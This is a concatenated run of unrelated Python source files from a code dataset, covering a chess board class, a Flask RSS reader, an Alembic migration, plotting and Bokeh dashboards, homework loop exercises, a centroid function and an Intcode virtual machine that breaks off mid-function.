Args : Aucun\n # Return Aucun\n #\n def __init__(self):\n self.ready = False\n self.players = 0\n self.board = []\n self.playerTurn = 0\n self.initBoard()\n\n #\n # DONE\n # Initialisation du tableau qui contient toutes les pièces de l'échiquier\n # Args : Aucun\n # Return : Aucun\n #\n def initBoard(self):\n self.board = [\n NoPiece(1, 1),\n NoPiece(1, 2),\n NoPiece(1, 3),\n NoPiece(1, 4),\n NoPiece(1, 5),\n NoPiece(1, 6),\n NoPiece(1, 7),\n NoPiece(1, 8),\n NoPiece(2, 1),\n NoPiece(2, 2),\n NoPiece(2, 3),\n Pawn(0, 2, 4),\n NoPiece(2, 5),\n NoPiece(2, 6),\n NoPiece(2, 7),\n NoPiece(2, 8),\n NoPiece(3, 1),\n NoPiece(3, 2),\n NoPiece(3, 3),\n NoPiece(3, 4),\n NoPiece(3, 5),\n NoPiece(3, 6),\n King(1, 3, 7),\n NoPiece(3, 8),\n NoPiece(4, 1),\n NoPiece(4, 2),\n NoPiece(4, 3),\n NoPiece(4, 4),\n NoPiece(4, 5),\n NoPiece(4, 6),\n NoPiece(4, 7),\n NoPiece(4, 8),\n NoPiece(5, 1),\n NoPiece(5, 2),\n NoPiece(5, 3),\n NoPiece(5, 4),\n NoPiece(5, 5),\n NoPiece(5, 6),\n NoPiece(5, 7),\n Knight(0, 5, 8),\n NoPiece(6, 1),\n NoPiece(6, 2),\n NoPiece(6, 3),\n NoPiece(6, 4),\n NoPiece(6, 5),\n NoPiece(6, 6),\n NoPiece(6, 7),\n Bishop(1, 6, 8),\n NoPiece(7, 1),\n NoPiece(7, 2),\n NoPiece(7, 3),\n NoPiece(7, 4),\n NoPiece(7, 5),\n NoPiece(7, 6),\n NoPiece(7, 7),\n NoPiece(7, 8),\n NoPiece(8, 1),\n NoPiece(8, 2),\n NoPiece(8, 3),\n NoPiece(8, 4),\n NoPiece(8, 5),\n NoPiece(8, 6),\n NoPiece(8, 7),\n NoPiece(8, 8)\n ]\n\n #\n # DONE\n # Renvoie le tableau qui contient toutes les pièces de l'échiquier\n # Args : Aucun\n # Return : Un tableau contenant les pièces\n #\n def getBoard(self):\n return self.board\n\n #\n # Met a jour le tableau contenant les pièces après un mouvement\n # Args : L'index de la pièce qui va bouger\n # Return : Aucun\n #\n def updateBoard(self, move):\n oldPieceIndex = self.getPieceIndex(move['oldX'], move['oldY'])\n oldPiece = self.board[oldPieceIndex]\n Logger.log(oldPiece.__name__)\n tempBoard = self.board\n for i in range(len(self.board)):\n if self.board[i].x == move['x'] and self.board[i].y == move['y']:\n if isinstance(self.board[oldPieceIndex], Pawn):\n self.board[i] = Pawn(move['id'], move['x'], move['y'])\n self.board[oldPieceIndex] = NoPiece(move['oldX'], move['oldY'])\n \n \n #\n # DONE\n # Un joueur peut-il rejoindre la partie?\n # Args : Aucun\n # Return : True si c'est possible, False sinon\n #\n def playerCanJoin(self):\n if self.players < 2:\n return True\n else:\n return False\n #\n # DONE\n # Ajoute un joueur à la partie\n # Args : Aucun\n # Return Aucun\n #\n def join(self):\n self.players += 1\n if self.players == 2:\n self.ready = True\n self.initBoard()\n\n #\n # DONE\n # La coordonnée est elle occupée? \n # Args : coordonée x, coordonée y\n # Return : index de la coordonnée si il n'y a pas de pièce, True sinon\n #\n def isSpaceOccupied(self, x, y):\n for i in range(len(self.board)):\n if self.board[i].x == x and self.board[i].y == y:\n if isinstance(self.board[i], NoPiece):\n return i\n else:\n return True\n \n \n #\n # DONE\n # Renvoie l'index d'une pièce en fonction de son x et y\n # Args : x, y de la pièce\n # Return : index de la pièce si elle est dans le tableau, False \n #\n def getPieceIndex(self, x, y):\n for i in range(len(self.board)):\n if self.board[i].x == x and self.board[i].y == y:\n return i\n return False\n \n #\n # TODO\n # S'occupe de bouger les pièces sur l'échiquier \n # Args : move (JSON?) pas fini donc pas sur\n # Return : Sais pas encore (pas fini)\n #\n def doMove(self, move):\n #Logger.log(move)\n r = self.isSpaceOccupied(move['x'], move['y'])\n if r is True:\n return 'space taken'\n elif isinstance(r, int):\n self.updateBoard(move)\n #\n # DONE\n # Renvoie une représentation JSON du tableau contenant les pièces\n # Args : Aucun\n # Return : tableau contenant les pièces et le tour du joueur\n #\n def getState(self):\n resData = {}\n tempBoard = self.board\n for i in range(len(tempBoard)):\n if type(tempBoard[i]) is not str and type(tempBoard[i]) is not list:\n tempBoard[i] = [tempBoard[i].__name__, tempBoard[i].joueur]\n \n resData['board'] = tempBoard\n resData['playerTurn'] = self.playerTurn\n resData['ready'] = self.ready\n return resData\n \n \n \n \n ","sub_path":"Backend/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292900280","text":"from flask import Flask\nfrom flask import render_template\nimport feedparser\n\napp = Flask (__name__)\n\nRSS_FEED = {'bbc': \"http://feeds.bbci.co.uk/news/rss.xml\", 'cnn' : \"http://rss.cnn.com/rss/edition.rss\", 'fox':\"http://feeds.foxnews.com/foxnews/lastest\", 'iol':\"http://rss.iol.io/iol/news\"}\n\n@app.route(\"/\")\n@app.route(\"/\")\n\ndef get_news(publication=\"bbc\"):\n feed = feedparser.parse(RSS_FEED[publication])\n return render_template(\"home.html\", articles = feed['entries'] )\n\n\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)\n\n","sub_path":"Python/Flask/Project1/dynamic_news.py","file_name":"dynamic_news.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146761344","text":"\"\"\"Initial\n\nRevision ID: 94fe22e29d3b\nRevises: \nCreate Date: 2018-06-06 17:04:23.868383\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '94fe22e29d3b'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('activo',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('ticker', sa.String(length=64), nullable=True),\n sa.Column('nombre', sa.String(length=64), nullable=True),\n sa.Column('tipo', sa.Integer(), nullable=True),\n sa.Column('url', sa.String(length=256), nullable=True),\n sa.Column('moneda', sa.String(length=3), nullable=True),\n sa.Column('descargar', sa.Boolean(), nullable=True),\n sa.Column('clase', sa.String(length=1), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('nombre'),\n sa.UniqueConstraint('ticker')\n )\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_timestamp'), 'user', ['timestamp'], unique=False)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('cotizacion',\n sa.Column('activo_id', sa.Integer(), nullable=False),\n sa.Column('fecha', sa.DateTime(), nullable=False),\n sa.Column('VL', sa.Float(), nullable=True),\n sa.ForeignKeyConstraint(['activo_id'], ['activo.id'], ),\n sa.PrimaryKeyConstraint('activo_id', 'fecha')\n )\n op.create_table('movimiento_activo',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('fecha', sa.DateTime(), nullable=True),\n sa.Column('unidades', sa.Float(), nullable=True),\n sa.Column('precio', sa.Float(), nullable=True),\n sa.Column('activo_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['activo_id'], ['activo.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('movimiento_activo')\n op.drop_table('cotizacion')\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_index(op.f('ix_user_timestamp'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n op.drop_table('activo')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/94fe22e29d3b_initial.py","file_name":"94fe22e29d3b_initial.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204983549","text":"#Contour is nothing but the outlines or shape of something.\n#Contour plots are isolines to represent the graphical 3-D surface by \n#plotting the Z slices. Simply we can say that Contour plots can be used to \n#show 3-Dimensional surfaces on a 2-Dimensional plane.\n\n#------Syntax-----------\n#To create a contour plot of an array Z. The level values are taken automatically by itself.\n#contour(Z)\n\n#To create a contour plot using the coordinates X, Y specify the (x, y) coordinates of the surface.\n#contour(X,Y,Z)\n\n#To contour up to N automatically-chosen levels.\n#contour(Z,N)\n#contour(X,Y,Z,N)\n\n#To draw contour lines at specified values in sequence V in increasing order.\n#contour(Z,V)\n#contour(X,Y,Z,V)\n\n#To fill the len(V)-1 regions between the values in V in increasing order.\n#contourf(..., V)\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef f(x, y):\n return (1 + x*2+ x *1 + y * 3) * np.exp(-x ** 2 -y ** 2)\n\nn = 0.01\n\nx = np.arange(-3.0, 3.0, n)\ny = np.arange(-2.0, 2.0, n)\nX, Y = np.meshgrid(x, y)\nX\nY\n\n\nplt.contourf(X, Y, f(X, Y), 8, alpha=.5, cmap='jet')\nC = plt.contour(X, Y, f(X, Y), 8, colors='black')\n\nplt.clabel(C, inline=1, fontsize=10)\nplt.title('Simple Contour Plot with labels')\n\nplt.show()\n\n#When we want to plot the numpy arrays which consists some data as \n#images can be rendered using the function called imshow().\n\nplt.imshow(f(X, Y))\n","sub_path":"Class/Contour Plot.py","file_name":"Contour Plot.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111445580","text":"import logging\n\nfrom fastapi import APIRouter, Body\nfrom starlette.responses import Response\n\nfrom service.native_form_service import form_template_service, form_posting_service, check_native_health\n\nnative_form_router = APIRouter()\n\n\n@native_form_router.get(\"/native/health\", tags=[\"native\", \"health\"])\ndef health():\n return check_native_health()\n\n\n@native_form_router.get(\"/native/form/{id}\", tags=[\"form\", \"native\"])\ndef get_form_by_id(id: str, response: Response):\n response.headers[\"Content-Type\"] = \"application/json\"\n return form_template_service(id).to_dict()\n\n\n@native_form_router.post(\"/native/form\", tags=[\"form\", \"native\"], status_code=201)\nasync def post_form_by_number(body=Body(...), response=Response):\n logging.info(f\"Body: {body}\")\n return await form_posting_service(json_body=body)","sub_path":"controller/native_form_controller.py","file_name":"native_form_controller.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"521614978","text":"# -*- coding: utf-8 -*-\n# import os\nimport numpy as np\nimport pandas as pd\n# import glob\n# import geopandas as gpd\n# import json\n# from bokeh.io import output_notebook, output_file\n# from bokeh.io import show\nfrom bokeh.plotting import figure\n# from bokeh.models import GeoJSONDataSource,LinearColorMapper,ColorBar\nfrom bokeh.models import ColumnDataSource,Panel#,FactorRange\nfrom bokeh.palettes import Category10#,brewer, Category20, Viridis256\n# from bokeh.models import FixedTicker,NumeralTickFormatter,HoverTool\n# from bokeh.plotting import show as show_inline\nfrom bokeh.models.widgets import RadioButtonGroup, Div\nfrom bokeh.layouts import column,WidgetBox#,row,widgetbox\n# from bokeh.io import curdoc\nimport situ_fn\n###############################################################################\ndef get_graph_data(df_all_n,agg,df_goal,candidates_data,gs_name,source_set,\n train_dates,test_dates,old_to_new_regions,old_to_new_sources):\n # Get data of chosen gold standard and source set\n results = df_all_n.loc[:,(df_all_n.loc['Region'] == gs_name[:-3]) & \\\n (df_all_n.loc['SourcesSet'] == source_set) & \\\n (df_all_n.loc['Column'] == 'id')].iloc[:,0]\n predictors_list = results.loc[results.index.isin(\\\n [np.str(i) for i in range(pd.notnull(results).sum()-4)])].values.tolist()\n predictors_list = [x.replace('_','-') for x in predictors_list]\n predictors_ts = candidates_data[source_set].loc[:,predictors_list]\n gs_ts = df_goal.loc[:,[gs_name]]\n \n \n ## Split between training and testing data, do regression\n # Split data\n X_train = predictors_ts.loc[train_dates[0]:train_dates[1]]\n X_test = predictors_ts.loc[test_dates[0]:test_dates[1]]\n y_train = gs_ts.loc[train_dates[0]:train_dates[1]]\n y_test = gs_ts.loc[test_dates[0]:test_dates[1]]\n dates_train = y_train.index.tolist()\n dates_test = y_test.index.tolist()\n \n # Do regression, forecast in and out of sample\n OOS_coef = situ_fn.lin_reg(y_train,X_train,lin_reg_intercept=True)\n in_sample_forecast_ts = situ_fn.lin_pred(X_train, OOS_coef)\n OOS_forecast_ts = situ_fn.lin_pred(X_test, OOS_coef)\n # in_sample_forecast_df = pd.DataFrame({'Date':dates_train,\n # 'InSample':in_sample_forecast_ts})\n # in_sample_forecast_df.set_index('Date',inplace=True)\n # OOS_forecast_df = pd.DataFrame({'Date':dates_test,'OOS':OOS_forecast_ts})\n # OOS_forecast_df.set_index('Date',inplace=True)\n \n # Compure R squared\n # r_squared_in_sample = situ_fn.R_squared_quick(np.array(y_train.iloc[:,0]),\n # in_sample_forecast_ts)\n # r_squared_OOS = situ_fn.R_squared_quick(np.array(y_test.iloc[:,0]),OOS_forecast_ts)\n agg_gs_source = agg.loc[(agg.Region == old_to_new_regions[gs_name[:-3]]) & \\\n (agg.SourcesSet == old_to_new_sources[source_set])]\n r_squared_in_sample = agg_gs_source.loc[\\\n agg_gs_source.ScoreType == 'InSample','Value'].iloc[0]\n r_squared_OOS = agg_gs_source.loc[agg_gs_source.ScoreType == 'OOS','Value'].iloc[0]\n \n return dates_train, dates_test, gs_ts,in_sample_forecast_ts,OOS_forecast_ts,\\\n r_squared_in_sample, r_squared_OOS\n###############################################################################\ndef fit_tab(agg_all_nfolds,df_all_nfolds,df_goal,candidates_data,train_dates,\n test_dates,old_to_new_sources,new_to_old_sources,old_to_new_regions,\n n_folds_list):\n ## Get region names and list of n_folds values\n region_names_new = list(old_to_new_regions.values())\n region_names_new.sort()\n n_folds_display = [np.str(x) for x in n_folds_list]\n \n ## Pick gold standard, data source and n_folds values to start with\n gs_name = 'AMAZONAS-VE'\n source_set_data = 'Best'\n n_folds_fit = n_folds_list[0]\n agg_n = agg_all_nfolds.loc[agg_all_nfolds.NbFolds == n_folds_fit,:]\n df_all_n = df_all_nfolds.loc[:,df_all_nfolds.loc['NbFolds'] == np.str(n_folds_fit)]\n if source_set_data == 'Best':\n agg_source_best = agg_n.loc[(agg_n.Region == old_to_new_regions[gs_name[:-3]]),\n 'BestSource'].values[0]\n source_set_data = new_to_old_sources[agg_source_best]\n \n dates_train, dates_test, gs_ts,in_sample_forecast_ts,OOS_forecast_ts,\\\n r_squared_in_sample, r_squared_OOS = get_graph_data(\\\n df_all_n,agg_n,df_goal,candidates_data,gs_name,source_set_data,\n train_dates,test_dates,old_to_new_regions,old_to_new_sources)\n \n ### Create Bokeh graph\n all_dates = pd.to_datetime(gs_ts.index.tolist())\n dates_train_plot = pd.to_datetime(dates_train)\n dates_test_plot = pd.to_datetime(dates_test)\n #xs = [dates_train,dates_test,dates_train,dates_test]\n # min_y = [np.max(np.concatenate((np.array(gs_ts.T)[0],in_sample_forecast_ts,OOS_forecast_ts),axis=0))]\n # max_y = [np.min(np.concatenate((np.array(gs_ts.T)[0],in_sample_forecast_ts,OOS_forecast_ts),axis=0))]\n min_y,max_y = [np.min(np.array(gs_ts.T)[0])],[np.max(np.array(gs_ts.T)[0])]\n xs = [all_dates,dates_train_plot,dates_test_plot,all_dates[:1],all_dates[:1]]\n ys = [np.array(gs_ts),in_sample_forecast_ts,OOS_forecast_ts,min_y,max_y]\n source = ColumnDataSource(data=dict(\n x = xs,\n y = ys,\n color = (Category10[3])[0:len(xs)] +['#ffffff','#ffffff'],\n group = ['Gold Standard','Forecast In Sample','Forecast OOS','','']))\n TOOLS=\"pan,wheel_zoom,box_zoom,reset,hover,save\"\n p_ts = figure(plot_width=1000, plot_height=500,x_axis_type='datetime',\n title='', tools=TOOLS,)\n p_ts.multi_line(\n xs='x',\n ys='y',\n legend='group',\n source=source,\n line_color='color')\n \n p_ts.legend.location = (0,350)\n \n ## Radio buttons\n # Define buttons\n sourceset_display = ['Best'] + list(new_to_old_sources.keys())[1:]\n #sourceset_display = ['Best'] + sourceset_names_old[1:]\n n_folds_button = RadioButtonGroup(labels=n_folds_display, active=0)\n source_set_button_plot = RadioButtonGroup(labels=sourceset_display, active=0)\n regions_button_plt = RadioButtonGroup(labels=region_names_new, active=0)\n \n # Text above graph\n div_text = 'In and Out of Sample fit
    Gold Standard: ' + \\\n old_to_new_regions[gs_name[:-3]] + '
    Predictor Set: ' + \\\n old_to_new_sources[source_set_data] + '
    ' + \\\n 'In Sample R2: ' + np.str(np.round(r_squared_in_sample,2)) + \\\n ' - ' + 'Out of Sample R2: ' + np.str(np.round(r_squared_OOS,2))\n div = Div(text=div_text,width=700, height=100)\n \n ###########################################################################\n # Update function\n def plot_callback(attr, old, new):\n # Get new selected value\n n_folds_fit = np.int(n_folds_display[n_folds_button.active])\n agg_n = agg_all_nfolds.loc[agg_all_nfolds.NbFolds == n_folds_fit,:]\n df_all_n = df_all_nfolds.loc[:,df_all_nfolds.loc['NbFolds'] == np.str(n_folds_fit)]\n \n gs_name_selected = region_names_new[regions_button_plt.active]\n if gs_name_selected == 'Distrito Federal':\n gs_name = 'DTTOMETRO-VE'\n else:\n gs_name = gs_name_selected.replace(' ','').upper() + '-VE'\n \n source_set = sourceset_display[source_set_button_plot.active]\n if source_set == 'Best':\n source_set_data = source_set\n agg_source_best = agg_n.loc[(agg_n.Region == old_to_new_regions[gs_name[:-3]]),\n 'BestSource'].values[0]\n source_set_data = new_to_old_sources[agg_source_best]\n else:\n source_set_data = new_to_old_sources[source_set]\n \n # Get data to update graph\n dates_train, dates_test, gs_ts,in_sample_forecast_ts,OOS_forecast_ts,\\\n r_squared_in_sample, r_squared_OOS = get_graph_data(\\\n df_all_n,agg_n,df_goal,candidates_data,gs_name,source_set_data,\n train_dates,test_dates,old_to_new_regions,old_to_new_sources)\n \n ### Create Bokeh graph\n all_dates = pd.to_datetime(gs_ts.index.tolist())\n dates_train_plot = pd.to_datetime(dates_train)\n dates_test_plot = pd.to_datetime(dates_test)\n #xs = [dates_train,dates_test,dates_train,dates_test]\n min_y,max_y = [np.min(np.array(gs_ts.T)[0])],[np.max(np.array(gs_ts.T)[0])]\n xs = [all_dates,dates_train_plot,dates_test_plot,all_dates[:1],all_dates[:1]]\n ys = [np.array(gs_ts),in_sample_forecast_ts,OOS_forecast_ts,min_y,max_y]\n \n new_source = ColumnDataSource(data=dict(\n x = xs,\n y = ys,\n color = (Category10[3])[0:len(xs)] +['#ffffff','#ffffff'],\n group = ['Gold Standard','Forecast In Sample','Forecast OOS','','']))\n source.data = new_source.data\n \n new_text = 'In and Out of Sample fit
    Gold Standard :' + \\\n old_to_new_regions[gs_name[:-3]] + ' - Predictor Set: ' + \\\n source_set + '
    ' + \\\n 'In Sample R2: ' + np.str(np.round(r_squared_in_sample,2)) + \\\n '
    Out of Sample R2: ' + np.str(np.round(r_squared_OOS,2))\n div.text = new_text\n return\n ###########################################################################\n \n n_folds_button.on_change('active', plot_callback)\n source_set_button_plot.on_change('active', plot_callback)\n regions_button_plt.on_change('active', plot_callback)\n \n # Put controls in a single element\n controls = WidgetBox(n_folds_button,regions_button_plt,source_set_button_plot)\n\t\n\t# Create a row layout\n layout = column(controls,div,p_ts)\n\t\n\t# Make a tab with the layout\n tab = Panel(child=layout, title = 'Regression Fit')\n \n return tab\n # To run from Spyder (radio buttons won't work)\n # output_file('foo.html')\n # show(column(regions_button_plt,source_set_button_plot,div,p_ts),browser=\"chrome\")\n \n # To run from command (in the folder of the file) using the command\n # bokeh serve --show visu_ts.py\n # curdoc().add_root(column(regions_button_plt,source_set_button_plot,div,p_ts))\n # curdoc().title = \"Venezuela Situational Awareness\"\n###############################################################################\n\n","sub_path":"visu_tab_fit.py","file_name":"visu_tab_fit.py","file_ext":"py","file_size_in_byte":10465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"270555048","text":"import bpy\nfrom .. import problems\nfrom .. preferences import getPreferences\nfrom .. utils.blender_ui import iterAreas\nfrom .. utils.nodes import getAnimationNodeTrees\n\ndef iterAutoExecutionNodeTrees(events):\n if not problems.canExecute(): return\n for nodeTree in getAnimationNodeTrees():\n if nodeTree.canAutoExecute(events):\n yield nodeTree\n\ndef executeNodeTrees(nodeTrees):\n for nodeTree in nodeTrees:\n nodeTree.autoExecute()\n\ndef afterExecution():\n prefs = getPreferences()\n if prefs.sceneUpdateAfterAutoExecution:\n for scene in set(tree.scene for tree in getAnimationNodeTrees()):\n scene.update()\n\n from .. events import isRendering\n if prefs.redrawAllAfterAutoExecution and not isRendering():\n redrawAll()\n\ndef redrawAll():\n for area in iterAreas():\n area.tag_redraw()\n","sub_path":"execution/auto_execution.py","file_name":"auto_execution.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"406167397","text":"#\n# hw6pr5.py - Intro to loops!\n#\n# Name: Xichen Lin\n# This is the CS5 gold intro-to-loops file\n#\n\n#\n# Example loop-based factorial!\n#\ndef fac(n):\n \"\"\" loop-based factorial function\n input: a nonnegative integer n\n output: the factorial of n\n \"\"\"\n result = 1 # starting value - like a base case\n for x in range(1,n+1): # loop from 1 to n, inclusive\n result = result * x # update the result by mult. by x\n return result # notice this is AFTER the loop!\n\n\n#\n# tests for factorial\n#\n\nprint(\"fac(0): should be 1 ==\", fac(0))\nprint(\"fac(5): should be 120 ==\", fac(5))\n\ndef power(b,p):\n result = 1\n for x in range(1,p+1):\n result = result * b\n return result\n\nprint(\"power(2,5): should be 32 ==\", power(2,5))\nprint(\"power(5,2): should be 25 ==\", power(5,2))\nprint(\"power(42,0): should be 1 ==\", power(42,0))\nprint(\"power(0,42): should be 0 ==\", power(0,42))\nprint(\"power(0,0): should be 1 ==\", power(0,0))\n\ndef summedOdds(L):\n sum = 0\n for x in L:\n if x/2 != x//2:\n sum = sum + x\n return sum\n\n\nprint(\"summedOdds( [4,5,6] ): should be 5 ==\", summedOdds( [4,5,6] ))\nprint(\"summedOdds( range(3,10) ): should be 24 ==\", summedOdds( list(range(3,10)) ))\n\n\ndef countGuesses( hidden ):\n \"\"\" uses a while loop to guess hidden, from 0 to 99\n input: hidden, a \"hidden\" integer from 0 to 99\n output: the number of guesses needed to guess hidden\n \"\"\"\n guess = random.choice( range(0,100) ) # 0 to 99, inclusive\n numguesses = 1 # we just made one guess, above\n while guess != hidden:\n guess = random.choice( range(0,100) ) # guess again!\n numguesses += 1 # add one to our number of guesses\n return numguesses\n\ndef unique( L ):\n \"\"\" returns whether all elements in L are unique\n input: L, a list of any elements\n output: True, if all elements in L are unique,\n or False, if there is any repeated element\n \"\"\"\n if len(L) == 0:\n return True\n elif L[0] in L[1:]:\n return False\n else:\n return unique( L[1:] ) # recursion is OK, too!\n\ndef untilARepeat( high ):\n L = []\n guess = random.choice( range(0, high ) ) # 0 to 99, inclusive\n numguesses = 1 # we just made one guess, above\n while unique(L):\n guess = random.choice( range(0, high ) )\n L = L + [guess] # guess again!\n numguesses += 1 # add one to our number of guesses\n return numguesses\n\n\n#\n# Below, write the other functions using loops:\n# power(b,p) # the hw provides tests...\n# summedOdds(L) # the hw provides tests...\n# untilARepeat(high) # try it! (randomness prevents usual testing)\n#\n","sub_path":"cs5/hw7/hw6pr5.py","file_name":"hw6pr5.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"309921677","text":"from geo import us_states, geo_distance, make_position, longitude, latitude\n\ndef find_centroid(polygon):\n\t\"\"\"\n\t>>> p1, p2, p3 = make_position(1, 2), make_position(3, 4), make_position(5, 0)\n\t>>> triangle = [p1, p2, p3, p1] # First vertex is also the last vertex\n\t>>> round5 = lambda x: round(x, 5) # Rounds floats to 5 digits\n\t>>> tuple(map(round5, find_centroid(triangle)))\n\t(3.0, 2.0, 6.0)\n\t>>> tuple(map(round5, find_centroid([p1, p3, p2, p1])))\n\t(3.0, 2.0, 6.0)\n\t>>> tuple(map(float, find_centroid([p1, p2, p1]))) # A zero-area polygon\n\t(1.0, 2.0, 0.0)\n\t\"\"\"\n\tarea, cx, cy = 0,0,0\n\tfor i in range(len(polygon)-1):\n\t\tx_i = latitude(polygon[i])\n\t\ty_i = longitude(polygon[i])\n\t\tx_i1 = latitude(polygon[i+1])\n\t\ty_i1 = longitude(polygon[i+1])\n\t\tarea = area + .5*((x_i)*(y_i1)-(x_i1)*(y_i))\n\t\tcx = cx + (x_i+x_i1)*(x_i*y_i1-x_i1*y_i)\n\t\tcy = cy + (y_i+y_i1)*(x_i*y_i1-x_i1*y_i)\n\tif area == 0:\n\t\treturn latitude(polygon[0]), longitude(polygon[0]), area\n\treturn cx/ (6*area), cy/(6*area), abs(area)\n","sub_path":"projects/Project2/find_centroid.py","file_name":"find_centroid.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20208275","text":"import sys\nimport time\nimport termcolor\nfrom collections import defaultdict, namedtuple\nimport aoc\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\n\ndef inp_decode(x):\n return list(map(int, x.split(\",\")))\n\ninp = aoc.get_input(inp_decode)\n_logger = aoc.get_logger()\n\nopcode = namedtuple(\"opcode\", [\"name\", \"parameter\"])\nopcodes = {\n 1: opcode(name=\"add\", parameter=\"iio\"),\n 2: opcode(name=\"mul\", parameter=\"iio\"),\n 3: opcode(name=\"inp\", parameter=\"o\"),\n 4: opcode(name=\"out\", parameter=\"i\"),\n 5: opcode(name=\"jit\", parameter=\"ii\"),\n 6: opcode(name=\"jif\", parameter=\"ii\"),\n 7: opcode(name=\"lt \", parameter=\"iio\"),\n 8: opcode(name=\"eq \", parameter=\"iio\"),\n 9: opcode(name=\"arb\", parameter=\"i\"),\n 99: opcode(name=\"hlt\", parameter=\"\"),\n}\n\n\nclass disassembler(object):\n def disassemble(self, prog):\n pos = 0\n commands = []\n while pos < len(prog):\n assemblerline = [f\"[{pos:< 5}]\"]\n commandcode = prog[pos] % 100\n try:\n assemblerline.append(opcodes[commandcode].name)\n for pindex, param in enumerate(opcodes[commandcode].parameter, start=1):\n encoding = (prog[pos] // pow(10, pindex + 1)) % 10\n modes = {0: \"*\", 1: \"\", 2: \"@\"}\n pv = prog[pos + pindex]\n assemblerline.append(f\"{modes[encoding]}{pv}\")\n pos += len(opcodes[commandcode].parameter) + 1\n except:\n assemblerline.append(\"XXX\")\n pos += 1\n finally:\n commands.append(\n \" \".join(map(lambda x: \"{0:>10}\".format(x), assemblerline))\n )\n return commands\n\nclass p2(object):\n def __init__(self):\n self.hardreset()\n self.processed_steps = []\n\n def hardreset(self):\n self.tinput = []\n self.mem = defaultdict(lambda: [{\"r\": 0, \"v\": 0, \"e\": 0, \"w\": {}}])\n self.reset()\n\n def reset(self):\n self.halt = False\n self.tinput_pos = 0\n self.output = []\n self.relativebase = [0]\n self.ip = 0\n self.steps = 0\n\n def set_prog(self, prog):\n for i, f in enumerate(prog):\n self.mem[i] = [{\"v\": f, \"r\": 0, \"e\": 0, \"w\": {}}]\n\n def add_input(self, inp):\n self.tinput.append(inp)\n\n def fetch_and_decode(self):\n opcode = self.read(self.ip, execute=True)\n params = [opcode % 100]\n self.decodeinfo = {\"ip\": self.ip, \"opcode\": opcode}\n for pindex, param in enumerate(opcodes[params[0]].parameter, start=1):\n encoding = (opcode // pow(10, pindex + 1)) % 10\n val = self.read(self.ip + pindex)\n if encoding == 2:\n val += self.relativebase[-1]\n self.decodeinfo[pindex] = {\n \"position\": self.ip + pindex,\n \"value\": val,\n \"mode\": encoding,\n \"paramtype\": param,\n }\n if param == \"i\":\n if encoding == 0 or encoding == 2:\n val = self.read(val)\n self.decodeinfo[pindex][\"decoded\"] = val\n params.append(val)\n return params\n\n def step(self):\n self.steps += 1\n fetched = self.fetch_and_decode()\n commandcode = fetched[0]\n params = fetched[1:]\n getattr(self, f\"opcode{commandcode:02d}\")(params)\n self.processed_steps.append(\n {\n \"decodinginfo\": self.decodeinfo,\n \"opcode\": commandcode,\n \"ip\": self.ip,\n \"params\": params,\n }\n )\n\n def run(self):\n self._processing = True\n while self._processing:\n self.step()\n\n def write(self, pos, value):\n self.mem[pos].append({\"v\": value, \"r\": 0, \"e\": 0, \"w\": self.decodeinfo})\n return self.mem[pos][-1][\"v\"]\n\n def read(self, pos, execute=False):\n if execute:\n self.mem[pos][-1][\"e\"] += 1\n self.mem[pos][-1][\"r\"] += 1\n return self.mem[pos][-1][\"v\"]\n\n def opcode01(self, params):\n res = params[0] + params[1]\n self.write(params[2], res)\n self.ip += 4\n\n def opcode02(self, params):\n res = params[0] * params[1]\n self.write(params[2], res)\n self.ip += 4\n\n def opcode03(self, params):\n if self.tinput_pos == len(self.tinput):\n _logger.debug(\"read, no input available\")\n self._processing = False\n return self.ip\n elif isinstance(self.tinput, list):\n res = self.tinput[self.tinput_pos]\n self.tinput_pos += 1\n else:\n res = self.tinput\n 